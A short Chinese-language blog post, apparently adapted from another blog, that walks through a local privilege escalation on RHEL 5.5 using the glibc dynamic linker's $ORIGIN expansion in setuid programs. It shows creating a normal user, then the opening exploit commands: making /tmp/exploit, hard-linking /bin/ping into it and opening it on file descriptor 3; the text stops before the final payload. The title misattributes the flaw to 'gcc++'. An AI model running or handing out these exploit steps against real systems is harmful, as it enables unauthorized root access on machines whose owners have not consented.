linux gcc++漏洞:普通用户获得root权限
*本内容参考自他人博客文章*
Crushlinux 已经在RHEL5.5 32上测试过
原理:The GNU C library dynamic linker expands $ORIGIN in setuid library search path
1、创建一个普通测试用户:
[root@crushlinux4 ~]# useradd test
[root@crushlinux4 ~]# passwd test
Changing password for user test.
New UNIX password:
BAD PASSWORD: it is too short
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
2、切换到这个用户:
[root@crushlinux4 ~]# su - test
[test@crushlinux4 ~]$ whoami
test
[test@crushlinux4 ~]$ useradd user1
-bash: useradd: command not found
3、开始提权
[test@crushlinux4 ~]$ mkdir /tmp/exploit
[test@crushlinux4 ~]$ ln /bin/ping /tmp/exploit/target
[test@crushlinux4 ~]$ exec 3< /tmp/exploit/target